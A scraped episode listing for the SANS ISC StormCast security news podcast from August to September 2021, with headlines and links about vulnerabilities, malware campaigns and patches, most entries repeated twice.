Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 ProntonMail/VPN Releasing User's IP Address https://protonmail.com/blog/climate-activist-arrest/ What's App End To End Encryption Questioned (but upheld) https://twitter.com/evacide/status/1435288900587589632?s=20 PRIVATELOG and STASHLOG Malware Store Payload in Common Log File System (CLFS) https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
9/8/20215 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, September 7th, 2021

Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://www.jenkins.io/blog/2021/09/04/wiki-attacked/ ProxyShell Update https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ RCE-0-Day for GhostScript 9.50 https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50 Netgear Switch Auth Bypass https://kb.netgear.com/000063978/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Smart-Switches-PSV-2021-0140-PSV-2021-0144-PSV-2021-0145
9/7/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, September 7th, 2021

Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://www.jenkins.io/blog/2021/09/04/wiki-attacked/ ProxyShell Update https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ RCE-0-Day for GhostScript 9.50 https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50 Netgear Switch Auth Bypass https://kb.netgear.com/000063978/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Smart-Switches-PSV-2021-0140-PSV-2021-0144-PSV-2021-0145
9/7/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, September 3rd, 2021

Attackers Will Always Abuse Major Events in our Lifes https://isc.sans.edu/forums/diary/Attackers+Will+Always+Abuse+Major+Events+in+our+Lifes/27808/ Active Exploitation of Confluence Server CVE-2021-26084 https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ GitHub Removing old Ciphers / Keys https://github.blog/2021-09-01-improving-git-protocol-security-github/ Cisco Enterprise NFV Infrastructure Software Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-g2DMVVh Hackers are Selling Tool to Hide Malware in GPUs https://www.ehackingnews.com/2021/09/hackers-are-selling-tool-to-hide.html Michael Beck: Cloud Forensics Triage Framework (CFTF) https://www.sans.org/white-papers/40415/
9/3/202114 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, September 3rd, 2021

Attackers Will Always Abuse Major Events in our Lifes https://isc.sans.edu/forums/diary/Attackers+Will+Always+Abuse+Major+Events+in+our+Lifes/27808/ Active Exploitation of Confluence Server CVE-2021-26084 https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ GitHub Removing old Ciphers / Keys https://github.blog/2021-09-01-improving-git-protocol-security-github/ Cisco Enterprise NFV Infrastructure Software Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-g2DMVVh Hackers are Selling Tool to Hide Malware in GPUs https://www.ehackingnews.com/2021/09/hackers-are-selling-tool-to-hide.html Michael Beck: Cloud Forensics Triage Framework (CFTF) https://www.sans.org/white-papers/40415/
9/3/202114 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, September 2nd, 2021

STRRAT: A Java Based RAT That Doesn't Care if You Have Java https://isc.sans.edu/forums/diary/STRRAT+a+Javabased+RAT+that+doesnt+care+if+you+have+Java/27798/ IPC360 Baby Monitor Vulnerability https://www.bitdefender.com/files/News/CaseStudies/study/402/Bitdefender-PR-Whitepaper-VictureIPC-creat5590-en-EN.pdf Annke Network Video Recorder Vulnerability https://us-cert.cisa.gov/ics/advisories/icsa-21-238-02 ProxyWare Abuse https://blog.talosintelligence.com/2021/08/proxyware-abuse.html
9/2/20216 minutes
Episode Artwork

ISC StormCast for Thursday, September 2nd, 2021

STRRAT: A Java Based RAT That Doesn't Care if You Have Java https://isc.sans.edu/forums/diary/STRRAT+a+Javabased+RAT+that+doesnt+care+if+you+have+Java/27798/ IPC360 Baby Monitor Vulnerability https://www.bitdefender.com/files/News/CaseStudies/study/402/Bitdefender-PR-Whitepaper-VictureIPC-creat5590-en-EN.pdf Annke Network Video Recorder Vulnerability https://us-cert.cisa.gov/ics/advisories/icsa-21-238-02 ProxyWare Abuse https://blog.talosintelligence.com/2021/08/proxyware-abuse.html
9/2/20216 minutes
Episode Artwork

ISC StormCast for Wednesday, September 1st, 2021

BrakTooth: Impacts, Implications and Next Steps https://isc.sans.edu/forums/diary/BrakTooth+Impacts+Implications+and+Next+Steps/27802/ Fortress Home Security System Weakness https://threatpost.com/fortress-home-security-remote-disarmament/169069/ PostgreSQL set_user Module Vulnerability https://www.postgresql.org/about/news/set_user-201-released-2279/
9/1/20215 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, September 1st, 2021

BrakTooth: Impacts, Implications and Next Steps https://isc.sans.edu/forums/diary/BrakTooth+Impacts+Implications+and+Next+Steps/27802/ Fortress Home Security System Weakness https://threatpost.com/fortress-home-security-remote-disarmament/169069/ PostgreSQL set_user Module Vulnerability https://www.postgresql.org/about/news/set_user-201-released-2279/
9/1/20215 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, August 31st, 2021

Cryptocurrency Clipboard Swapper Delivered With Love https://isc.sans.edu/forums/diary/Cryptocurrency+Clipboard+Swapper+Delivered+With+Love/27794/ ProxyToken Vulnerability in Exchange https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server LockFile Ransomware Evasion Tricks https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html
8/31/20215 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, August 31st, 2021

Cryptocurrency Clipboard Swapper Delivered With Love https://isc.sans.edu/forums/diary/Cryptocurrency+Clipboard+Swapper+Delivered+With+Love/27794/ ProxyToken Vulnerability in Exchange https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server LockFile Ransomware Evasion Tricks https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html
8/31/20215 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, August 30th, 2021

ChaosDB: Azure Cosmos Database Vulnerability https://chaosdb.wiz.io Phishing via Open Redirects https://www.microsoft.com/security/blog/2021/08/26/widespread-credential-phishing-campaign-abuses-open-redirector-links/ Parallels Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/208188 https://www.zerodayinitiative.com/advisories/ZDI-21-1000/
8/30/20215 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, August 30th, 2021

ChaosDB: Azure Cosmos Database Vulnerability https://chaosdb.wiz.io Phishing via Open Redirects https://www.microsoft.com/security/blog/2021/08/26/widespread-credential-phishing-campaign-abuses-open-redirector-links/ Parallels Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/208188 https://www.zerodayinitiative.com/advisories/ZDI-21-1000/
8/30/20215 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, August 27th, 2021

Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x GETH DoS Vulnerability https://github.com/ethereum/go-ethereum/releases/tag/v1.10.8 Confluence Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html VMWare Updates https://www.vmware.com/security/advisories.html
8/27/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, August 27th, 2021

Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x GETH DoS Vulnerability https://github.com/ethereum/go-ethereum/releases/tag/v1.10.8 Confluence Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html VMWare Updates https://www.vmware.com/security/advisories.html
8/27/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, August 26th, 2021

There May Be Many More SPF Records Than We Might Expect https://isc.sans.edu/forums/diary/There+may+be+many+more+SPF+records+than+we+might+expect/27786/ OpenSSL Update https://www.openssl.org/news/vulnerabilities.html F5 Update https://support.f5.com/csp/article/K50974556 https://support.f5.com/csp/article/K41351250 SideWalk Backdoor https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
8/26/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, August 26th, 2021

There May Be Many More SPF Records Than We Might Expect https://isc.sans.edu/forums/diary/There+may+be+many+more+SPF+records+than+we+might+expect/27786/ OpenSSL Update https://www.openssl.org/news/vulnerabilities.html F5 Update https://support.f5.com/csp/article/K50974556 https://support.f5.com/csp/article/K41351250 SideWalk Backdoor https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
8/26/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, August 25th, 2021

Attackers Hunting for Twilio Credentials https://isc.sans.edu/forums/diary/Attackers+Hunting+For+Twilio+Credentials/27782/ Modified WhatsApp Spreading Malware https://securelist.com/triada-trojan-in-whatsapp-mod/103679/ Privilege Escalation without Pluggin in Device http://0xsp.com/security%20research%20&%20development%20(SRD)/local-administrator-is-not-just-with-razer-it-is-possible-for-all
8/25/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, August 25th, 2021

Attackers Hunting for Twilio Credentials https://isc.sans.edu/forums/diary/Attackers+Hunting+For+Twilio+Credentials/27782/ Modified WhatsApp Spreading Malware https://securelist.com/triada-trojan-in-whatsapp-mod/103679/ Privilege Escalation without Pluggin in Device http://0xsp.com/security%20research%20&%20development%20(SRD)/local-administrator-is-not-just-with-razer-it-is-possible-for-all
8/25/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, August 24th, 2021

Out of Band Phishing Using SMS Messages to Evade Network Detection https://isc.sans.edu/forums/diary/Out+of+Band+Phishing+Using+SMS+messages+to+Evade+Network+Detection/27768/ Elevate Priviledges with Razer Mouse https://twitter.com/j0nh4t/status/1429049506021138437 Realtek Vulnerabilites Exploited https://securingsam.com/realtek-vulnerabilities-weaponized/ Exposed Microsoft Power Apps https://www.upguard.com/breaches/power-apps
8/24/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, August 24th, 2021

Out of Band Phishing Using SMS Messages to Evade Network Detection https://isc.sans.edu/forums/diary/Out+of+Band+Phishing+Using+SMS+messages+to+Evade+Network+Detection/27768/ Elevate Priviledges with Razer Mouse https://twitter.com/j0nh4t/status/1429049506021138437 Realtek Vulnerabilites Exploited https://securingsam.com/realtek-vulnerabilities-weaponized/ Exposed Microsoft Power Apps https://www.upguard.com/breaches/power-apps
8/24/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, August 23rd, 2021

Waiting for the C2 to Show Up https://isc.sans.edu/forums/diary/Waiting+for+the+C2+to+Show+Up/27772/ DOCX with Embdedded EXE https://isc.sans.edu/forums/diary/docx+With+Embedded+EXE/27776/ Securing Your Windows 365 Cloud PCs https://techcommunity.microsoft.com/t5/windows-it-pro-blog/securing-your-windows-365-cloud-pcs/ba-p/2663129 Pegasus Fraud Scam https://www.ehackingnews.com/2021/08/pegasus-iphone-hacks-used-as-bait-in.html Proper Audit Logging for Office 365 https://zolder.io/office-365-audit-logging/
8/23/20215 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, August 23rd, 2021

Waiting for the C2 to Show Up https://isc.sans.edu/forums/diary/Waiting+for+the+C2+to+Show+Up/27772/ DOCX with Embdedded EXE https://isc.sans.edu/forums/diary/docx+With+Embedded+EXE/27776/ Securing Your Windows 365 Cloud PCs https://techcommunity.microsoft.com/t5/windows-it-pro-blog/securing-your-windows-365-cloud-pcs/ba-p/2663129 Pegasus Fraud Scam https://www.ehackingnews.com/2021/08/pegasus-iphone-hacks-used-as-bait-in.html Proper Audit Logging for Office 365 https://zolder.io/office-365-audit-logging/
8/23/20215 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, August 20th, 2021

When Lightning Strikes: What works and doesn't work https://isc.sans.edu/forums/diary/When+Lightning+Strikes+What+works+and+doesnt+work/27766/ Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cisco-sb-rv-overflow-htpymMB5 Blackberry QNX Products Vulnerability https://support.blackberry.com/kb/articleDetail?articleNumber=000082334 SANS.edu Student: Mark Morowcynzski; Decreasing Attacker Dwell Time in Azure Active Directory https://www.sans.org/white-papers/40390/
8/20/202115 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, August 20th, 2021

When Lightning Strikes: What works and doesn't work https://isc.sans.edu/forums/diary/When+Lightning+Strikes+What+works+and+doesnt+work/27766/ Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cisco-sb-rv-overflow-htpymMB5 Blackberry QNX Products Vulnerability https://support.blackberry.com/kb/articleDetail?articleNumber=000082334 SANS.edu Student: Mark Morowcynzski; Decreasing Attacker Dwell Time in Azure Active Directory https://www.sans.org/white-papers/40390/
8/20/202115 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, August 19th, 2021

5 Things to Consider Before Moving Back to the Office https://isc.sans.edu/forums/diary/5+Things+to+Consider+Before+Moving+Back+to+the+Office/27762/ Adobe Patches https://helpx.adobe.com/security.html Several Web Sites Infected with Chinese Spyware https://imp0rtp3.wordpress.com/2021/08/12/tetris/ Trickbot Tricks Users with 1Password https://www.ehackingnews.com/2021/08/trickbot-employs-bogus-1password.html
8/19/20214 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, August 19th, 2021

5 Things to Consider Before Moving Back to the Office https://isc.sans.edu/forums/diary/5+Things+to+Consider+Before+Moving+Back+to+the+Office/27762/ Adobe Patches https://helpx.adobe.com/security.html Several Web Sites Infected with Chinese Spyware https://imp0rtp3.wordpress.com/2021/08/12/tetris/ Trickbot Tricks Users with 1Password https://www.ehackingnews.com/2021/08/trickbot-employs-bogus-1password.html
8/19/20214 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, August 18th, 2021

Laravel Exploit Attempts Tageting Vulnerability in "Ignition" https://isc.sans.edu/forums/diary/Laravel+v842+exploit+attempts+for+CVE20213129+debug+mode+Remote+code+execution/27758/ ThroughTek "Kaley" Protocol Vulnerability https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html Fortinet FortiWeb Vulnerability https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
8/18/20216 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, August 18th, 2021

Laravel Exploit Attempts Tageting Vulnerability in "Ignition" https://isc.sans.edu/forums/diary/Laravel+v842+exploit+attempts+for+CVE20213129+debug+mode+Remote+code+execution/27758/ ThroughTek "Kaley" Protocol Vulnerability https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html Fortinet FortiWeb Vulnerability https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
8/18/20216 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, August 17th, 2021

Triage of Malware Bazaar's Daily Malware Batches https://isc.sans.edu/forums/diary/Extra+Tip+For+Triage+Of+MALWARE+Bazaars+Daily+Malware+Batches/27754/ Realtek SDK Vulnerability https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf STARTTLS Vulnerabilities https://www.usenix.org/conference/usenixsecurity21/presentation/poddebniak Racoon Infostealer Self Infection https://mobile.twitter.com/HRock/status/1427259563363950596
8/17/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, August 17th, 2021

Triage of Malware Bazaar's Daily Malware Batches https://isc.sans.edu/forums/diary/Extra+Tip+For+Triage+Of+MALWARE+Bazaars+Daily+Malware+Batches/27754/ Realtek SDK Vulnerability https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf STARTTLS Vulnerabilities https://www.usenix.org/conference/usenixsecurity21/presentation/poddebniak Racoon Infostealer Self Infection https://mobile.twitter.com/HRock/status/1427259563363950596
8/17/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, August 16th, 2021

Exchange E-Discovery Scans https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Exchange+eDiscovery/27748/ Danabot Distributed Through Malspam https://isc.sans.edu/forums/diary/Example+of+Danabot+distributed+through+malspam/27744/ Weaponizing Middleboxes https://geneva.cs.umd.edu/posts/usenix21-weaponizing-censors/ https://www.usenix.org/conference/usenixsecurity21/presentation/bock Deep Blue Magic Ransomware https://www.ehackingnews.com/2021/08/deepbluemagic-newly-discovered.html
8/16/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, August 16th, 2021

Exchange E-Discovery Scans https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Exchange+eDiscovery/27748/ Danabot Distributed Through Malspam https://isc.sans.edu/forums/diary/Example+of+Danabot+distributed+through+malspam/27744/ Weaponizing Middleboxes https://geneva.cs.umd.edu/posts/usenix21-weaponizing-censors/ https://www.usenix.org/conference/usenixsecurity21/presentation/bock Deep Blue Magic Ransomware https://www.ehackingnews.com/2021/08/deepbluemagic-newly-discovered.html
8/16/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, August 13th, 2021

Print Nightmare Continues: CVE-2021-36958 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958 Print Nightmare Abused by Ransomware Gangs https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/ PolyNetwork Attack https://www.theregister.com/2021/08/10/poly_networks_cryptocurrency_theft/
8/13/20213 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, August 13th, 2021

Print Nightmare Continues: CVE-2021-36958 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958 Print Nightmare Abused by Ransomware Gangs https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/ PolyNetwork Attack https://www.theregister.com/2021/08/10/poly_networks_cryptocurrency_theft/
8/13/20213 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, August 12th, 2021

TA551 Shathak Continues Pushing BazarLoader Leading to Cobalt Strike https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/ New AdLoad Campaign Goes Undetected by XProtect https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/ Android FlyTrap Malware Hitting Facebook Users https://www.ehackingnews.com/2021/08/android-malware-flytrap-hacks-facebook.html 5G Shortcuts allow Evesdropping https://www.wired.com/story/5g-network-stingray-surveillance-non-standalone/ Cloud DNS Service Weeknesses https://www.wiz.io/blog/black-hat-2021-dns-loophole-makes-nation-state-level-spying-as-easy-as-registering-a-domain
8/12/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, August 12th, 2021

TA551 Shathak Continues Pushing BazarLoader Leading to Cobalt Strike https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/ New AdLoad Campaign Goes Undetected by XProtect https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/ Android FlyTrap Malware Hitting Facebook Users https://www.ehackingnews.com/2021/08/android-malware-flytrap-hacks-facebook.html 5G Shortcuts allow Evesdropping https://www.wired.com/story/5g-network-stingray-surveillance-non-standalone/ Cloud DNS Service Weeknesses https://www.wiz.io/blog/black-hat-2021-dns-loophole-makes-nation-state-level-spying-as-easy-as-registering-a-domain
8/12/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, August 11th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2021+Patch+Tuesday/27736/ Adobe Patches https://helpx.adobe.com/security.html cPanel/WHM Vulnerabilities https://www.fortbridge.co.uk/research/multiple-vulnerabilities-in-cpanel-whm/ Firefox Update Released https://www.mozilla.org/en-US/firefox/91.0/releasenotes/
8/11/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, August 11th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2021+Patch+Tuesday/27736/ Adobe Patches https://helpx.adobe.com/security.html cPanel/WHM Vulnerabilities https://www.fortbridge.co.uk/research/multiple-vulnerabilities-in-cpanel-whm/ Firefox Update Released https://www.mozilla.org/en-US/firefox/91.0/releasenotes/
8/11/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, August 10th, 2021

Microsoft Exchange ProxyShell https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/ Synology Warns of Brute Force Attacks https://www.synology.com/en-global/company/news/article/BruteForce/Synology %20Investigates%20Ongoing%20Brute-Force%20Attacks%20From%20Botnet Router Auth Bypass https://threatpost.com/auth-bypass-bug-routers-exploited/168491/ Firefox Version 100 Experiment https://bugzilla.mozilla.org/show_bug.cgi?id=1719070 Interaction Less Vulnerabilities in Messaging Apps https://www.ehackingnews.com/2021/08/the-interaction-less-flaws-in-messaging.html HTTP2 Vulnerabilities https://portswigger.net/research/http2#conclusion
8/10/20215 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, August 10th, 2021

Microsoft Exchange ProxyShell https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/ Synology Warns of Brute Force Attacks https://www.synology.com/en-global/company/news/article/BruteForce/Synology %20Investigates%20Ongoing%20Brute-Force%20Attacks%20From%20Botnet Router Auth Bypass https://threatpost.com/auth-bypass-bug-routers-exploited/168491/ Firefox Version 100 Experiment https://bugzilla.mozilla.org/show_bug.cgi?id=1719070 Interaction Less Vulnerabilities in Messaging Apps https://www.ehackingnews.com/2021/08/the-interaction-less-flaws-in-messaging.html HTTP2 Vulnerabilities https://portswigger.net/research/http2#conclusion
8/10/20215 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, August 9th, 2021

Malicious Microsoft Word Remains A Key Infection Vector https://isc.sans.edu/forums/diary/Malicious+Microsoft+Word+Remains+A+Key+Infection+Vector/27716/ Malware Bazaar Daily Download https://isc.sans.edu/forums/diary/MALWARE+Bazaar+Download+daily+malware+batches/27728/ Go/Rust IP Address Validation Vulnerability https://github.com/rust-lang/rust/pull/83652 Facial Recognition "Master Keys" https://arxiv.org/pdf/2108.01077.pdf Pulse Secure Patch Bypass https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858 Hadoop ResourceManager Vulnerability Exploited https://blog.netlab.360.com/wei-xie-kuai-xun-teamtntxin-huo-dong-tong-guo-gan-ran-wang-ye-wen-jian-ti-gao-chuan-bo-neng-li/
8/9/20215 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, August 9th, 2021

Malicious Microsoft Word Remains A Key Infection Vector https://isc.sans.edu/forums/diary/Malicious+Microsoft+Word+Remains+A+Key+Infection+Vector/27716/ Malware Bazaar Daily Download https://isc.sans.edu/forums/diary/MALWARE+Bazaar+Download+daily+malware+batches/27728/ Go/Rust IP Address Validation Vulnerability https://github.com/rust-lang/rust/pull/83652 Facial Recognition "Master Keys" https://arxiv.org/pdf/2108.01077.pdf Pulse Secure Patch Bypass https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858 Hadoop ResourceManager Vulnerability Exploited https://blog.netlab.360.com/wei-xie-kuai-xun-teamtntxin-huo-dong-tong-guo-gan-ran-wang-ye-wen-jian-ti-gao-chuan-bo-neng-li/
8/9/20215 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, August 6th, 2021

Cisco Patches Unauthencticated RCE in RV340/345 devices https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy Telegram Flawed Self Destruct in MacOS https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/telegram-self-destruct-not-always/ Significant Vulnerabilities in MacOS Privacy Protections https://www.darkreading.com/application-security/researchers-find-significant-vulnerabilities-in-mac-os-privacy-protections Windows Hello Bypass https://threatpost.com/microsofts-patch-windows-hello-faulty/168392/ STI Student: James Casteel; Content Security Policy Bypass: Exploiting Misconfigurations https://www.sans.org/white-papers/40380
8/6/202115 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, August 6th, 2021

Cisco Patches Unauthencticated RCE in RV340/345 devices https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy Telegram Flawed Self Destruct in MacOS https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/telegram-self-destruct-not-always/ Significant Vulnerabilities in MacOS Privacy Protections https://www.darkreading.com/application-security/researchers-find-significant-vulnerabilities-in-mac-os-privacy-protections Windows Hello Bypass https://threatpost.com/microsofts-patch-windows-hello-faulty/168392/ STI Student: James Casteel; Content Security Policy Bypass: Exploiting Misconfigurations https://www.sans.org/white-papers/40380
8/6/202115 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, August 5th, 2021

Pivoting and Hunting for Shenanigans from a Reported Phishing Domain https://isc.sans.edu/forums/diary/Pivoting+and+Hunting+for+Shenanigans+from+a+Reported+Phishing+Domain/27710/ NichStack TCP/IP Vulnerabilities https://jfrog.com/blog/infrahalt-14-new-security-vulnerabilities-found-in-nichestack/ Securing the Cloud https://www.sans.org/newsletters/ouch/securely-using-the-cloud/ Lockbit Recruiting Insiders https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/ Sneaky Phishing Hittin Office 365 Users https://www.ehackingnews.com/2021/08/microsoft-warns-office-365-users-of.html
8/5/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, August 5th, 2021

Pivoting and Hunting for Shenanigans from a Reported Phishing Domain https://isc.sans.edu/forums/diary/Pivoting+and+Hunting+for+Shenanigans+from+a+Reported+Phishing+Domain/27710/ NichStack TCP/IP Vulnerabilities https://jfrog.com/blog/infrahalt-14-new-security-vulnerabilities-found-in-nichestack/ Securing the Cloud https://www.sans.org/newsletters/ouch/securely-using-the-cloud/ Lockbit Recruiting Insiders https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/ Sneaky Phishing Hittin Office 365 Users https://www.ehackingnews.com/2021/08/microsoft-warns-office-365-users-of.html
8/5/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, August 4th, 2021

2FA Issues https://isc.sans.edu/forums/diary/Three+Problems+with+Two+Factor+Authentication/27704/ Crazy Smishing https://isc.sans.edu/forums/diary/Is+this+the+Weirdest+Phishing+SMishing+Attempt+Ever/27706/ Google Chrome Update https://chromereleases.googleblog.com/2021/08/the-stable-channel-has-been-updated-to.html https://www.bleepingcomputer.com/news/google/google-chrome-to-no-longer-show-secure-website-indicators/ Google Android Update https://source.android.com/security/bulletin/2021-08-01?hl=en DoD/NSA Publichses Kubernetes Hardening Guides https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
8/3/20215 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, August 4th, 2021

2FA Issues https://isc.sans.edu/forums/diary/Three+Problems+with+Two+Factor+Authentication/27704/ Crazy Smishing https://isc.sans.edu/forums/diary/Is+this+the+Weirdest+Phishing+SMishing+Attempt+Ever/27706/ Google Chrome Update https://chromereleases.googleblog.com/2021/08/the-stable-channel-has-been-updated-to.html https://www.bleepingcomputer.com/news/google/google-chrome-to-no-longer-show-secure-website-indicators/ Google Android Update https://source.android.com/security/bulletin/2021-08-01?hl=en DoD/NSA Publichses Kubernetes Hardening Guides https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
8/3/20215 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, August 3rd, 2021

Unsolicited DNS Queries https://isc.sans.edu/forums/diary/Unsolicited+DNS+Queries/27694/ Changing BAT Files on the Fly https://isc.sans.edu/forums/diary/Changing+BAT+Files+On+The+Fly/27700/ Empty NPM Package has Over 700,000 Downloads https://www.bleepingcomputer.com/news/software/empty-npm-package-has-over-700-000-downloads-heres-why/ Blocking PetitPotam with netsh RPC Filters https://twitter.com/gentilkiwi/status/1421949715986403329 Pneumatic Tube Vulnerabilities https://www.blackhat.com/us-21/briefings/schedule/index.html#a-hole-in-the-tube-uncovering-vulnerabilities-in-critical-infrastructure-of-healthcare-facilities-23546
8/3/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, August 3rd, 2021

